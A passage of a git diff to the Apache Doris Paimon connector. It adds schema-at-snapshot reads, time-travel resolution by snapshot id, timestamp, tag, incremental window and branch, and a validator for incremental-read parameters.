HANDLE's partitionKeys (the handle was + // built from the latest table.partitionKeys()); fields + primaryKeys come from the live + // table. Sharing buildTableSchema with the at-snapshot path keeps the two from drifting. + return buildTableSchema( + paimonHandle.getTableName(), + table.rowType().getFields(), + paimonHandle.getPartitionKeys(), + table.primaryKeys()); + } + + /** + * Returns the schema AS OF {@code snapshot.getSchemaId()} (the pinned schema version, for + * time-travel reads under schema evolution). Falls back to the LATEST schema + * ({@link #getTableSchema(ConnectorSession, ConnectorTableHandle)}) when there is no pinned + * schema id (null snapshot or {@code schemaId < 0}), which also covers system tables (their + * synthetic rowType is their own and has no schema-version history). + * + *

    When a pinned schema id IS present, the schema at that version is resolved through the + * {@link PaimonCatalogOps#schemaAt} seam and mapped with the SAME field mapping AND the same + * {@code partition_columns}/{@code primary_keys} property emission as the latest path (via the + * shared {@link #buildTableSchema}). Unlike the latest path, the partition keys come from the + * RESOLVED historical schema (not the handle), because under schema evolution the partition set + * may itself differ at the pinned version — mirroring legacy {@code initSchema(schemaId)}, which + * read {@code tableSchema.partitionKeys()} of the pinned schema. + */ + @Override + public ConnectorTableSchema getTableSchema( + ConnectorSession session, ConnectorTableHandle handle, + ConnectorMvccSnapshot snapshot) { + if (snapshot == null || snapshot.getSchemaId() < 0) { + return getTableSchema(session, handle); + } + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + Table table = resolveTable(paimonHandle); + PaimonCatalogOps.PaimonSchemaSnapshot schema = + catalogOps.schemaAt(table, snapshot.getSchemaId()); + return buildTableSchema( + paimonHandle.getTableName(), + schema.fields(), + schema.partitionKeys(), + schema.primaryKeys()); + } + + /** + * Maps paimon {@code fields} to Doris columns and emits the {@code partition_columns} / + * {@code primary_keys} schema properties exactly the way the latest path always has. Factored + * out so the latest path and the at-snapshot path ({@link #getTableSchema(ConnectorSession, + * ConnectorTableHandle, ConnectorMvccSnapshot)}) share ONE mapping and cannot drift. + */ + private ConnectorTableSchema buildTableSchema(String tableName, List fields, + List partitionKeys, List primaryKeys) { + List columns = mapFields(fields, primaryKeys); Map schemaProps = new HashMap<>(); - if (paimonHandle.getPartitionKeys() != null - && !paimonHandle.getPartitionKeys().isEmpty()) { - schemaProps.put("partition_keys", - String.join(",", paimonHandle.getPartitionKeys())); + if (partitionKeys != null && !partitionKeys.isEmpty()) { + // Emit "partition_columns" (NOT "partition_keys"): the generic fe-core consumer + // PluginDrivenExternalTable.initSchema reads "partition_columns" — keying it under + // "partition_keys" left the FE treating paimon as non-partitioned. Mirrors MaxCompute. + schemaProps.put("partition_columns", String.join(",", partitionKeys)); } if (primaryKeys != null && !primaryKeys.isEmpty()) { schemaProps.put("primary_keys", String.join(",", primaryKeys)); } - return new ConnectorTableSchema( - paimonHandle.getTableName(), - columns, - "PAIMON", - schemaProps); + return new ConnectorTableSchema(tableName, columns, "PAIMON", schemaProps); } // ==================== E7: System Tables ==================== @@ -279,56 +327,268 @@ public Optional beginQuerySnapshot( } /** - * Time-travel by snapshot id. Returns the pinned snapshot when it exists, else - * {@link Optional#empty()} per the SPI Javadoc ("or empty if none"). + * Resolves an explicit time-travel {@code spec} into a pinned {@link ConnectorMvccSnapshot}, + * owning ALL paimon-specific parsing (snapshot-id lookup, datetime parse, tag resolution). This + * is the unified seam that supersedes the retired {@code getSnapshotById}/{@code getSnapshotAt} + * (B5b). The returned snapshot carries (a) the resolved {@code snapshotId}, (b) the resolved + * {@code schemaId} so schema-at-snapshot reads pick the historical schema, and (c) the + * connector's scan-option {@code properties} (which {@link #applySnapshot} threads into the + * scan handle). * - *

    CONTRACT DIFFERENCE (intentional, documented): legacy - * {@code PaimonUtil.getPaimonSnapshotBySnapshotId} THREW a {@code UserException} - * ("can't find snapshot by id") when the id was absent. The SPI contract here is empty-if-none, - * so surfacing the user-facing "not found" error is the B5 fe-core consumer's responsibility — - * this is NOT a silent data bug. + *

    Maps each {@link ConnectorTimeTravelSpec.Kind} to legacy + * {@code PaimonExternalTable.getPaimonSnapshotCacheValue} (lines 124-144): + *

      + *
    • {@code SNAPSHOT_ID} — {@code Long.parseLong(stringValue)}; if the snapshot does not + * exist returns {@link Optional#empty()}; pins {@code scan.snapshot-id}.
    • + *
    • {@code TIMESTAMP} — derives epoch-millis (digital ⇒ {@code Long.parseLong}; else paimon + * {@code DateTimeUtils.parseTimestampData(value, 3, sessionTZ)}, the byte-parity datetime + * parse), then the at-or-before snapshot; empty when none; pins {@code scan.snapshot-id}. + *
    • + *
    • {@code TAG} — resolves the tag's snapshot; empty when absent; pins {@code scan.tag-name} + * to the tag NAME (legacy pins the name, not the id).
    • + *
    • {@code INCREMENTAL} — {@code @incr(...)} read: validates the raw window params via + * {@link PaimonIncrementalScanParams#validate} (the ~180-line legacy validation, ported + * byte-faithfully) and pins at the LATEST snapshot (legacy {@code @incr} reads latest with + * EMPTY partition info and applies the {@code incremental-between*} options at scan time). + * The validated options are carried as {@code properties}; because that map is non-empty, + * {@link #applySnapshot} threads exactly those options and does NOT inject + * {@code scan.snapshot-id} (which would conflict with {@code incremental-between}).
    • + *
    • {@code BRANCH} — {@code @branch('name')} read: validates the branch on the BASE table via + * {@link PaimonCatalogOps#branchExists} (empty-if-absent, like snapshot/tag not-found), then + * loads the branch as its OWN table (independent schema/snapshots, via the 3-arg branch + * Identifier through {@link PaimonTableHandle#withBranch}) and pins its LATEST snapshot — + * branches have NO in-branch time-travel (legacy {@code PaimonExternalTable} reads the + * branch's {@code latestSnapshot()} only). The branch identity is carried to + * {@link #applySnapshot} via an internal sentinel ({@code CoreOptions.BRANCH} key, NOT a + * scan-copy option); no {@code scan.snapshot-id} is pinned (the branch reads its own latest). + * An empty branch (no snapshot) pins {@code snapshotId=-1} and {@code schemaId=-1}: a benign + * divergence from legacy's {@code schemaId=0L} — the resulting schema is identical (both + * resolve to the branch's current schema), mirroring the INCREMENTAL empty-table -1 note.
    • + *
    * - *

    System tables do not expose time-travel -> {@link Optional#empty()}. + *

    CONTRACT DIFFERENCE (intentional, documented): legacy {@code PaimonUtil} THREW a + * {@code UserException} when the id/timestamp/tag was not found. The SPI contract here is + * empty-if-none; the B5b-3 fe-core consumer translates {@link Optional#empty()} into the + * user-facing error. Not-found is returned as empty; only a malformed spec (e.g. a non-digital + * snapshot id) propagates as an exception, matching legacy {@code Long.parseLong}. + * + *

    System tables do not expose time-travel (same guard as {@link #beginQuerySnapshot}) → + * {@link Optional#empty()}. */ @Override - public Optional getSnapshotById( - ConnectorSession session, ConnectorTableHandle handle, long snapshotId) { + public Optional resolveTimeTravel( + ConnectorSession session, ConnectorTableHandle handle, + ConnectorTimeTravelSpec spec) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; if (paimonHandle.isSystemTable()) { return Optional.empty(); } Table table = resolveTable(paimonHandle); - if (!catalogOps.snapshotExists(table, snapshotId)) { - return Optional.empty(); + switch (spec.getKind()) { + case SNAPSHOT_ID: { + long id = Long.parseLong(spec.getStringValue()); + if (!catalogOps.snapshotExists(table, id)) { + return Optional.empty(); + } + long schemaId = catalogOps.snapshotSchemaId(table, id).orElse(-1L); + return Optional.of(ConnectorMvccSnapshot.builder() + .snapshotId(id) + .schemaId(schemaId) + .property(CoreOptions.SCAN_SNAPSHOT_ID.key(), String.valueOf(id)) + .build()); + } + case TIMESTAMP: { + long millis = parseTimestampMillis(session, spec); + OptionalLong id = catalogOps.snapshotIdAtOrBefore(table, millis); + if (!id.isPresent()) { + return Optional.empty(); + } + long snapshotId = id.getAsLong(); + long schemaId = catalogOps.snapshotSchemaId(table, snapshotId).orElse(-1L); + return Optional.of(ConnectorMvccSnapshot.builder() + .snapshotId(snapshotId) + .schemaId(schemaId) + .property(CoreOptions.SCAN_SNAPSHOT_ID.key(), String.valueOf(snapshotId)) + .build()); + } + case TAG: { + String tagName = spec.getStringValue(); + Optional tag = + catalogOps.getSnapshotByTag(table, tagName); + if (!tag.isPresent()) { + return Optional.empty(); + } + // Legacy pins the tag NAME (scan.tag-name=value), NOT the snapshot id + // (PaimonExternalTable.java:137), so a later schema/data change to the tag is honored. + return Optional.of(ConnectorMvccSnapshot.builder() + .snapshotId(tag.get().snapshotId()) + .schemaId(tag.get().schemaId()) + .property(CoreOptions.SCAN_TAG_NAME.key(), tagName) + .build()); + } + case INCREMENTAL: { + // Validate the raw @incr window params and produce the paimon scan options. This is + // the ~180-line legacy validation, ported byte-faithfully into the connector + // (PaimonIncrementalScanParams). The produced opts hold incremental-between* keys ONLY + // (the legacy null-valued scan.snapshot-id/scan.mode resets are stripped — see that + // class's javadoc for why that's byte-parity on a freshly-loaded base table). + Map opts = PaimonIncrementalScanParams.validate(spec.getIncrementalParams()); + // Legacy @incr reads at the LATEST snapshot and applies incremental-between at scan time: + // PaimonExternalTable.getPaimonSnapshotCacheValue falls through (neither tag/branch nor + // FOR VERSION/TIME AS OF) to getLatestSnapshotCacheValue (the LATEST partition view + LATEST + // schema), and PaimonScanNode.getProcessedTable copies the incremental options onto the base + // table. fe-core (PluginDrivenMvccExternalTable.loadSnapshot) mirrors this: the INCREMENTAL + // kind lists the LATEST partitions and uses the LATEST schema, carrying these incremental scan + // options on the pin. Pin latest; an empty table (no snapshot) falls back to -1. + long snapshotId = catalogOps.latestSnapshotId(table).orElse(-1L); + long schemaId = snapshotId < 0 + ? -1L + : catalogOps.snapshotSchemaId(table, snapshotId).orElse(-1L); + // opts is NON-EMPTY, so applySnapshot threads exactly these (incremental-between*) and + // does NOT inject scan.snapshot-id (which would conflict with incremental-between). + return Optional.of(ConnectorMvccSnapshot.builder() + .snapshotId(snapshotId) + .schemaId(schemaId) + .properties(opts) + .build()); + } + case BRANCH: { + String branchName = spec.getStringValue(); + // Validate on the BASE table (legacy resolvePaimonBranch validates the branch against + // the base table's branchManager). Graceful empty-if-absent (fe-core B5b-3 translates + // to the "can't find branch" UserException), consistent with snapshot/tag not-found. + if (!catalogOps.branchExists(table, branchName)) { + return Optional.empty(); + } + // Load the branch as its OWN table (independent schema/snapshots) and pin its LATEST + // snapshot — branches do not support in-branch time-travel (legacy reads + // latestSnapshot() only). + Table branchTable = resolveTable(paimonHandle.withBranch(branchName)); + long snapshotId = catalogOps.latestSnapshotId(branchTable).orElse(-1L); + long schemaId = snapshotId < 0 + ? -1L + : catalogOps.snapshotSchemaId(branchTable, snapshotId).orElse(-1L); + // Carry the branch identity to applySnapshot via an internal sentinel + // (CoreOptions.BRANCH key). Branch is a handle-IDENTITY change, not a scan-copy + // option: applySnapshot reads this sentinel and routes it to handle.withBranch (it is + // never threaded into Table.copy). No scan.snapshot-id is pinned (the branch table + // natively reads its own latest). + return Optional.of(ConnectorMvccSnapshot.builder() + .snapshotId(snapshotId) + .schemaId(schemaId) + .property(CoreOptions.BRANCH.key(), branchName) + .build()); + } + default: + throw new UnsupportedOperationException( + "unsupported time-travel kind: " + spec.getKind()); + } + } + + /** + * Derives epoch-millis from a {@code TIMESTAMP} spec, byte-faithful to legacy + * {@code PaimonUtil.getPaimonSnapshotByTimestamp}: a digital value is {@code Long.parseLong}; + * a non-digital value is parsed by paimon {@code DateTimeUtils.parseTimestampData(value, 3, TZ)} + * where TZ is the SESSION time zone. + * + *

    BYTE-PARITY TZ DECISION: legacy passed {@code TimeUtils.getTimeZone()} = + * {@code TimeZone.getTimeZone(ZoneId.of(sessionTz, dorisAliasMap))}. The connector cannot import + * the fe-core Doris alias map, so it derives the zone from {@link ConnectorSession#getTimeZone()} + * via {@code TimeZone.getTimeZone(ZoneId.of(tz))} — identical to legacy for every standard zone + * id (e.g. "Asia/Shanghai", "UTC"). + * + *

    FAIL-LOUD on unsupported alias (NOT silent degrade): time-travel is STRICTER than predicate + * pushdown. Doris-specific aliases that {@link java.time.ZoneId#of} rejects (e.g. "CST", "PST", + * "EST") are a KNOWN LIMITATION for datetime-string time-travel — the connector cannot import the + * fe-core alias map to resolve them. Rather than silently falling back to another zone (a wrong + * zone would resolve the WRONG snapshot -> silently wrong rows), such an alias is rejected with a + * clear, actionable {@link DorisConnectorException}. (This deliberately does NOT follow the + * MaxComputePredicateConverter pattern of degrading to NO_PREDICATE on a bad alias: that is safe + * only because BE re-applies the predicate, whereas a mis-resolved time-travel zone has no such + * safety net.) The legacy {@code millis < 0} guard is preserved. + */ + private long parseTimestampMillis(ConnectorSession session, ConnectorTimeTravelSpec spec) { + String value = spec.getStringValue(); + if (spec.isDigital()) { + return Long.parseLong(value); } - return Optional.of(ConnectorMvccSnapshot.builder().snapshotId(snapshotId).build()); + // Resolve the session zone ONLY inside this catch so a legitimate + // DateTimeUtils.parseTimestampData("can't parse time") below is NOT swallowed: an unsupported + // Doris-alias zone (e.g. "CST"/"PST", which ZoneId.of rejects with a DateTimeException) must + // fail loud with actionable guidance, never silently degrade to a wrong zone (a wrong zone + // selects the WRONG snapshot -> silently wrong rows). + java.time.ZoneId zoneId; + try { + zoneId = java.time.ZoneId.of(session.getTimeZone()); + } catch (java.time.DateTimeException e) { + throw new DorisConnectorException( + "session time zone '" + session.getTimeZone() + "' is not a standard zone id and " + + "cannot be used for FOR TIME AS OF with a datetime string; use a standard " + + "IANA zone id (e.g. 'Asia/Shanghai', 'UTC'), or specify epoch " + + "milliseconds, or use FOR VERSION AS OF .", e); + } + java.util.TimeZone tz = java.util.TimeZone.getTimeZone(zoneId); + long millis = DateTimeUtils.parseTimestampData(value, 3, tz).getMillisecond(); + if (millis < 0) { + throw new java.time.DateTimeException("can't parse time: " + value); + } + return millis; } /** - * Time-travel by wall-clock time. Returns the latest snapshot committed at or before - * {@code timestampMillis}, else {@link Optional#empty()} when none qualifies. + * Threads a pinned MVCC / time-travel {@code snapshot} into the handle BEFORE planScan: returns + * a copy of {@code handle} carrying the connector's resolved scan options so the scan path reads + * at that snapshot/tag (the scan provider applies them via {@code Table.copy}). + * + *

    Threads the FULL {@code snapshot.getProperties()} map: this may be + * {@code scan.snapshot-id=} (snapshot-id / timestamp time-travel) OR + * {@code scan.tag-name=} (tag time-travel), whichever {@link #resolveTimeTravel} pinned. + * When {@code properties} is empty (the {@link #beginQuerySnapshot} latest-pin path, which + * carries no properties) it falls back to {@code scan.snapshot-id=} for B5a parity. * - *

    CONTRACT DIFFERENCE (intentional, documented): legacy - * {@code PaimonUtil.getPaimonSnapshotByTimestamp} THREW a {@code UserException} (with the - * earliest-snapshot's timestamp hint) when no snapshot was at-or-before the time. The SPI - * contract here is empty-if-none, so the B5 fe-core consumer is responsible for surfacing that - * user-facing error — this is NOT a silent data bug. + *

    BRANCH is special: when the snapshot carries the {@code CoreOptions.BRANCH} sentinel (set by + * {@link #resolveTimeTravel}'s BRANCH case), it is a handle-IDENTITY change, not a scan option — + * it is detected FIRST and routed to {@link PaimonTableHandle#withBranch} (which clears the + * transient base Table so the branch reloads), never threaded into {@code Table.copy}. * - *

    System tables do not expose time-travel -> {@link Optional#empty()}. + *

    System tables have no MVCC (they are synthetic metadata views — same guard as + * {@link #beginQuerySnapshot}), so a sys handle is returned unchanged. */ @Override - public Optional getSnapshotAt( - ConnectorSession session, ConnectorTableHandle handle, long timestampMillis) { + public ConnectorTableHandle applySnapshot(ConnectorSession session, + ConnectorTableHandle handle, ConnectorMvccSnapshot snapshot) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; if (paimonHandle.isSystemTable()) { - return Optional.empty(); + return paimonHandle; } - Table table = resolveTable(paimonHandle); - OptionalLong id = catalogOps.snapshotIdAtOrBefore(table, timestampMillis); - if (!id.isPresent()) { - return Optional.empty(); + if (snapshot != null) { + String branch = snapshot.getProperties().get(CoreOptions.BRANCH.key()); + if (branch != null) { + // Branch time-travel is a handle-identity change (a different table load), not a scan + // option: route to withBranch (which clears the transient base Table so resolveTable + // reloads the branch). The branch reads its own latest, so no scan.snapshot-id is + // pinned. Detected BEFORE the generic properties path so the branch sentinel never + // becomes a scan-copy option. + return paimonHandle.withBranch(branch); + } + if (!snapshot.getProperties().isEmpty()) { + // Explicit time-travel: the connector already resolved the exact scan options + // (scan.snapshot-id OR scan.tag-name etc.) in resolveTimeTravel — thread them verbatim. + return paimonHandle.withScanOptions(snapshot.getProperties()); + } + } + // Empty-properties latest-pin (beginQuerySnapshot) path. Empty-table / query-begin parity: + // beginQuerySnapshot pins INVALID_SNAPSHOT_ID (-1) for an empty table rather than + // Optional.empty(). A -1 (or a null snapshot) must NOT become scan.snapshot-id=-1, because + // Table.copy(scan.snapshot-id=-1) resolves to a non-existent snapshot in the paimon SDK + // (confusing "snapshot/file not found"). Legacy never copied an invalid id: its empty / + // query-begin path reads latest WITHOUT a copy. So return the handle UNCHANGED (read latest). + if (snapshot == null || snapshot.getSnapshotId() < 0) { + return paimonHandle; } - return Optional.of(ConnectorMvccSnapshot.builder().snapshotId(id.getAsLong()).build()); + Map scanOptions = Collections.singletonMap( + CoreOptions.SCAN_SNAPSHOT_ID.key(), String.valueOf(snapshot.getSnapshotId())); + return paimonHandle.withScanOptions(scanOptions); } /** @@ -577,6 +837,11 @@ private List collectPartitions(PaimonTableHandle paimonH return Collections.emptyList(); } + // Partition enumeration is intentionally BASE-only: branch / time-travel reads carry EMPTY + // partition info (legacy PaimonPartitionInfo.EMPTY) and never reach this path, so for the + // (non-branch) handles that do, resolveTable returns the base table and the base-Identifier + // listing below is consistent. (A branch handle would otherwise mix branch schema metadata + // here with the base partition list — but that combination does not occur by design.) Table table = resolveTable(paimonHandle); Identifier identifier = Identifier.create( paimonHandle.getDatabaseName(), paimonHandle.getTableName()); @@ -652,8 +917,7 @@ private Table resolveTable(PaimonTableHandle paimonHandle) { } } - private List mapFields(RowType rowType, List primaryKeys) { - List fields = rowType.getFields(); + private List mapFields(List fields, List primaryKeys) { List columns = new ArrayList<>(fields.size()); for (DataField field : fields) { ConnectorType connectorType = PaimonTypeMapping.toConnectorType( diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java new file mode 100644 index 00000000000000..8aa9a747610839 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java @@ -0,0 +1,269 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.DorisConnectorException; + +import java.util.HashMap; +import java.util.Map; + +/** + * Validates the raw Doris {@code @incr(...)} window parameters and produces the paimon SDK scan + * option map that {@code Table.copy(...)} applies for an incremental read. + * + *

    This is a BYTE-FAITHFUL port of legacy + * {@code org.apache.doris.datasource.paimon.source.PaimonScanNode#validateIncrementalReadParams} + * (lines 701-878): per design D-043/D-044 (B5b), the ~180-line validation + paimon option-key + * production MOVES INTO the connector; fe-core (B5b-3) passes only the RAW Doris param map. The two + * parameter groups — snapshot-based ({@code startSnapshotId}/{@code endSnapshotId}/ + * {@code incrementalBetweenScanMode}) and timestamp-based ({@code startTimestamp}/ + * {@code endTimestamp}) — are MUTUALLY EXCLUSIVE. Every validation rule and every error + * message string is reproduced for parity, EXCEPT the legacy {@code UserException} (fe-core type) + * is replaced by {@link DorisConnectorException} (the connector cannot import fe-core). + * + *

    BENIGN DIVERGENCE (documented): legacy seeds the result map with + * {@code paimonScanParams.put(PAIMON_SCAN_SNAPSHOT_ID, null)} and + * {@code put(PAIMON_SCAN_MODE, null)} (lines 842-843) as defensive RESETS — it copies these + * nulls onto a base {@code Table} that may have inherited {@code scan.snapshot-id}/{@code scan.mode} + * from a prior pin. Here the connector resolves a FRESH {@code Table} per query (no inherited + * scan.snapshot-id/scan.mode), so the resets are a no-op in EFFECT. Moreover + * {@code ConnectorMvccSnapshot.Builder.property(...)} rejects null values + * ({@code Objects.requireNonNull}). So this port emits ONLY the non-null keys + * ({@code incremental-between} / {@code incremental-between-timestamp} / + * {@code incremental-between-scan-mode}); stripping the null resets is byte-parity in EFFECT on a + * freshly-loaded base table. + */ +public final class PaimonIncrementalScanParams { + + // The keys of incremental read params for the Paimon SDK (legacy PaimonScanNode lines 83-87). + private static final String PAIMON_SCAN_SNAPSHOT_ID = "scan.snapshot-id"; + private static final String PAIMON_SCAN_MODE = "scan.mode"; + private static final String PAIMON_INCREMENTAL_BETWEEN = "incremental-between"; + private static final String PAIMON_INCREMENTAL_BETWEEN_SCAN_MODE = "incremental-between-scan-mode"; + private static final String PAIMON_INCREMENTAL_BETWEEN_TIMESTAMP = "incremental-between-timestamp"; + + // The keys of incremental read params for the Doris statement (legacy PaimonScanNode lines 89-93). + private static final String DORIS_START_SNAPSHOT_ID = "startSnapshotId"; + private static final String DORIS_END_SNAPSHOT_ID = "endSnapshotId"; + private static final String DORIS_START_TIMESTAMP = "startTimestamp"; + private static final String DORIS_END_TIMESTAMP = "endTimestamp"; + private static final String DORIS_INCREMENTAL_BETWEEN_SCAN_MODE = "incrementalBetweenScanMode"; + + private PaimonIncrementalScanParams() { + } + + /** + * Validates the raw Doris {@code @incr} window {@code params} and returns the paimon SDK option + * map (the non-null {@code incremental-between*} keys). Byte-faithful to legacy + * {@code PaimonScanNode.validateIncrementalReadParams}; throws {@link DorisConnectorException} + * (in place of the legacy {@code UserException}) with the SAME message strings. + * + * @param params the raw Doris incremental-read window arguments + * @return the paimon scan option map (null-valued reset keys stripped — see class doc) + */ + public static Map validate(Map params) { + // Check if snapshot-based parameters exist + boolean hasStartSnapshotId = params.containsKey(DORIS_START_SNAPSHOT_ID) + && params.get(DORIS_START_SNAPSHOT_ID) != null; + boolean hasEndSnapshotId = params.containsKey(DORIS_END_SNAPSHOT_ID) + && params.get(DORIS_END_SNAPSHOT_ID) != null; + boolean hasIncrementalBetweenScanMode = params.containsKey(DORIS_INCREMENTAL_BETWEEN_SCAN_MODE) + && params.get(DORIS_INCREMENTAL_BETWEEN_SCAN_MODE) != null; + + // Check if timestamp-based parameters exist + boolean hasStartTimestamp = params.containsKey(DORIS_START_TIMESTAMP) + && params.get(DORIS_START_TIMESTAMP) != null; + boolean hasEndTimestamp = params.containsKey(DORIS_END_TIMESTAMP) && params.get(DORIS_END_TIMESTAMP) != null; + + // Check if any snapshot-based parameters are present + boolean hasSnapshotParams = hasStartSnapshotId || hasEndSnapshotId || hasIncrementalBetweenScanMode; + + // Check if any timestamp-based parameters are present + boolean hasTimestampParams = hasStartTimestamp || hasEndTimestamp; + + // Rule 2: The two groups are mutually exclusive + if (hasSnapshotParams && hasTimestampParams) { + throw new DorisConnectorException( + "Cannot specify both snapshot-based parameters" + + "(startSnapshotId, endSnapshotId, incrementalBetweenScanMode) " + + "and timestamp-based parameters (startTimestamp, endTimestamp) at the same time"); + } + + // Validate snapshot-based parameters group + if (hasSnapshotParams) { + // Rule 3.1 & 3.2: DORIS_START_SNAPSHOT_ID is required + if (!hasStartSnapshotId) { + throw new DorisConnectorException( + "startSnapshotId is required when using snapshot-based incremental read"); + } + + // Rule 3.3: DORIS_INCREMENTAL_BETWEEN_SCAN_MODE can only appear + // when both start and end snapshot IDs are specified + if (hasIncrementalBetweenScanMode && (!hasStartSnapshotId || !hasEndSnapshotId)) { + throw new DorisConnectorException( + "incrementalBetweenScanMode can only be specified when" + + " both startSnapshotId and endSnapshotId are provided"); + } + + // Validate snapshot ID values + if (hasStartSnapshotId) { + try { + long startSId = Long.parseLong(params.get(DORIS_START_SNAPSHOT_ID)); + if (startSId < 0) { + throw new DorisConnectorException("startSnapshotId must be greater than or equal to 0"); + } + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid startSnapshotId format: " + e.getMessage()); + } + } + + if (hasEndSnapshotId) { + try { + long endSId = Long.parseLong(params.get(DORIS_END_SNAPSHOT_ID)); + if (endSId < 0) { + throw new DorisConnectorException("endSnapshotId must be greater than or equal to 0"); + } + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid endSnapshotId format: " + e.getMessage()); + } + } + + // Check if both snapshot IDs are present and validate their relationship + if (hasStartSnapshotId && hasEndSnapshotId) { + try { + long startSId = Long.parseLong(params.get(DORIS_START_SNAPSHOT_ID)); + long endSId = Long.parseLong(params.get(DORIS_END_SNAPSHOT_ID)); + if (startSId > endSId) { + throw new DorisConnectorException( + "startSnapshotId must be less than or equal to endSnapshotId"); + } + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid snapshot ID format: " + e.getMessage()); + } + } + + // Validate DORIS_INCREMENTAL_BETWEEN_SCAN_MODE + if (hasIncrementalBetweenScanMode) { + String scanMode = params.get(DORIS_INCREMENTAL_BETWEEN_SCAN_MODE).toLowerCase(); + if (!scanMode.equals("auto") && !scanMode.equals("diff") + && !scanMode.equals("delta") && !scanMode.equals("changelog")) { + throw new DorisConnectorException( + "incrementalBetweenScanMode must be one of: auto, diff, delta, changelog"); + } + } + } + + // Validate timestamp-based parameters group + if (hasTimestampParams) { + // Rule 4.1 & 4.2: DORIS_START_TIMESTAMP is required + if (!hasStartTimestamp) { + throw new DorisConnectorException( + "startTimestamp is required when using timestamp-based incremental read"); + } + + // Validate timestamp values + if (hasStartTimestamp) { + try { + long startTS = Long.parseLong(params.get(DORIS_START_TIMESTAMP)); + if (startTS < 0) { + throw new DorisConnectorException("startTimestamp must be greater than or equal to 0"); + } + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid startTimestamp format: " + e.getMessage()); + } + } + + if (hasEndTimestamp) { + try { + long endTS = Long.parseLong(params.get(DORIS_END_TIMESTAMP)); + if (endTS <= 0) { + throw new DorisConnectorException("endTimestamp must be greater than 0"); + } + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid endTimestamp format: " + e.getMessage()); + } + } + + // Check if both timestamps are present and validate their relationship + if (hasStartTimestamp && hasEndTimestamp) { + try { + long startTS = Long.parseLong(params.get(DORIS_START_TIMESTAMP)); + long endTS = Long.parseLong(params.get(DORIS_END_TIMESTAMP)); + if (startTS >= endTS) { + throw new DorisConnectorException("startTimestamp must be less than endTimestamp"); + } + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid timestamp format: " + e.getMessage()); + } + } + } + + // If no incremental parameters are provided at all, that's also invalid in this context + if (!hasSnapshotParams && !hasTimestampParams) { + throw new DorisConnectorException( + "Invalid paimon incremental read params: at least one valid parameter group must be specified"); + } + + // Fill the result map based on parameter combinations. + // BENIGN DIVERGENCE (see class doc): legacy seeds PAIMON_SCAN_SNAPSHOT_ID=null and + // PAIMON_SCAN_MODE=null here (lines 842-843) as defensive RESETS against a base Table that + // may have inherited a prior scan.snapshot-id/scan.mode. The connector resolves a FRESH Table + // per query (no inherited keys), so these null resets are a no-op in EFFECT; and + // ConnectorMvccSnapshot.Builder.property rejects null values. So we DO NOT seed the null keys + // (stripping them is byte-parity on a freshly-loaded base table) and emit only the non-null + // incremental-between* keys below. + Map paimonScanParams = new HashMap<>(); + + if (hasSnapshotParams) { + // Legacy re-seeds PAIMON_SCAN_MODE=null here (line 846); stripped (see above). + if (hasStartSnapshotId && !hasEndSnapshotId) { + // Only startSnapshotId is specified + throw new DorisConnectorException( + "endSnapshotId is required when using snapshot-based incremental read"); + } else if (hasStartSnapshotId && hasEndSnapshotId) { + // Both start and end snapshot IDs are specified + String startSId = params.get(DORIS_START_SNAPSHOT_ID); + String endSId = params.get(DORIS_END_SNAPSHOT_ID); + paimonScanParams.put(PAIMON_INCREMENTAL_BETWEEN, startSId + "," + endSId); + } + + // Add incremental between scan mode if present. + // GOTCHA (parity): the value is validated lowercase above, but the ORIGINAL-CASE value is + // emitted (legacy line 859-860 puts params.get(...) verbatim, not the lowercased copy). + if (hasIncrementalBetweenScanMode) { + paimonScanParams.put(PAIMON_INCREMENTAL_BETWEEN_SCAN_MODE, + params.get(DORIS_INCREMENTAL_BETWEEN_SCAN_MODE)); + } + } + + if (hasTimestampParams) { + String startTS = params.get(DORIS_START_TIMESTAMP); + String endTS = params.get(DORIS_END_TIMESTAMP); + + if (hasStartTimestamp && !hasEndTimestamp) { + // Only startTimestamp is specified + paimonScanParams.put(PAIMON_INCREMENTAL_BETWEEN_TIMESTAMP, startTS + "," + Long.MAX_VALUE); + } else if (hasStartTimestamp && hasEndTimestamp) { + // Both start and end timestamps are specified + paimonScanParams.put(PAIMON_INCREMENTAL_BETWEEN_TIMESTAMP, startTS + "," + endTS); + } + } + + return paimonScanParams; + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index d6fc21ad5d9b26..47c15bf14871ed 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -80,10 +80,13 @@ * session needs explicit {@code PartitionSpec}s and therefore consumes {@code requiredPartitions}); * for Paimon the engine set would be redundant with the predicate it already pushes. The SPI * default chain (6-arg → 5-arg → 4-arg) routes correctly with {@code requiredPartitions} - * dropped. Consequence: FE EXPLAIN shows {@code partition=0/0} (no engine-level partition count) - * because the FE currently treats Paimon tables as non-partitioned; that is a known display gap - * tracked with the {@code partition_columns} 